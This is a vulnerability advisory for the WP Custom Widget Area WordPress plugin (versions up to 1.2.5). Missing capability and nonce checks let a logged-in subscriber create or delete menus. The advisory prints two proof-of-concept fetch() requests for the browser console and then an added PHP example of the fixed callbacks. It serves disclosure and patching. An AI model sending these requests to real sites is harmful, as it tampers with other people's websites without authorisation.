Source: wpexploit
Author: Krzysztof Zając (CERT PL)
ID: WPEX-ID:F8F84D47-49AA-4258-A8A6-3DE8E7342623
Date: Dec 21, 2023 - 12:00 a.m.

WP Custom Widget Area <= 1.2.5 - Subscriber+ Menus Creation/Deletion/Update


AI Score: 6.7 (Confidence: High)
EPSS: 0 (Percentile: 14.0%)

Description

The plugin does not properly apply capability and nonce checks on any of its AJAX action callback functions, which could allow attackers with subscriber+ privilege to create, delete or modify menus on the site.

Log in as a subscriber and paste any of the following fetch() calls into your browser's console:

// Deletes an existing menu
fetch("http://vulnerable-site.tld/wp-admin/admin-ajax.php?action=delete_menu", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": "data[cwa_id]=test",
  "method": "POST",
})

// Creates a new menu with a title set to "Hacked Title"
fetch("http://vulnerable-site.tld/wp-admin/admin-ajax.php?action=add_menu", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": "data[cwa_id]=test&data[cwa_name]=Hacked+Title",
  "method": "POST",
})
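
What the missing nonce and capability checks look like when present on the two callbacks exercised above, as an added example that is not the plugin's code. The `delete_menu` / `add_menu` action names and the `data[cwa_id]` / `data[cwa_name]` fields come from the requests above; every `cwa_example_*` name, the nonce action, the `nonce` request field and the option key are hypothetical, and the option-based storage is a stand-in for the plugin's own.

```php
<?php
// Added example, not the plugin's code. Action and field names come from the requests above;
// every cwa_example_* name, the nonce action and the option key below are hypothetical.
const CWA_EXAMPLE_NONCE  = 'cwa_example_manage_menus';
const CWA_EXAMPLE_OPTION = 'cwa_example_menus';
// Gate shared by every state-changing callback: CSRF check first, then authorization.
function cwa_example_authorize() {
    // Third argument false: return the result instead of dying, so the reply stays JSON.
    if ( ! check_ajax_referer( CWA_EXAMPLE_NONCE, 'nonce', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid or missing nonce' ), 403 );
    }
    // Subscribers lack edit_theme_options, the capability core requires for menus and widgets.
    if ( ! current_user_can( 'edit_theme_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient privileges' ), 403 );
    }
}

// Read data[cwa_id] / data[cwa_name] defensively; array-valued fields sanitize to ''.
function cwa_example_input() {
    $data = ( isset( $_POST['data'] ) && is_array( $_POST['data'] ) ) ? wp_unslash( $_POST['data'] ) : array();
    return array(
        'id'   => isset( $data['cwa_id'] ) ? sanitize_key( $data['cwa_id'] ) : '',
        'name' => isset( $data['cwa_name'] ) ? sanitize_text_field( $data['cwa_name'] ) : '',
    );
}

function cwa_example_add_menu() {
    cwa_example_authorize();
    $in = cwa_example_input();
    if ( '' === $in['id'] || '' === $in['name'] ) {
        wp_send_json_error( array( 'message' => 'cwa_id and cwa_name are required' ), 400 );
    }
    $menus              = (array) get_option( CWA_EXAMPLE_OPTION, array() );
    $menus[ $in['id'] ] = $in['name'];
    update_option( CWA_EXAMPLE_OPTION, $menus );
    wp_send_json_success( array( 'cwa_id' => $in['id'] ) );
}

function cwa_example_delete_menu() {
    cwa_example_authorize();
    $in    = cwa_example_input();
    $menus = (array) get_option( CWA_EXAMPLE_OPTION, array() );
    unset( $menus[ $in['id'] ] );
    update_option( CWA_EXAMPLE_OPTION, $menus );
    wp_send_json_success();
}
// Only wp_ajax_* (logged-in) hooks are registered; no wp_ajax_nopriv_* variants.
add_action( 'wp_ajax_add_menu', 'cwa_example_add_menu' );
add_action( 'wp_ajax_delete_menu', 'cwa_example_delete_menu' );
```

The admin screen that drives these callbacks would issue the token with `wp_create_nonce( CWA_EXAMPLE_NONCE )` and send it as the `nonce` field. With that in place, a subscriber's request fails the capability check even if a nonce is obtained.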
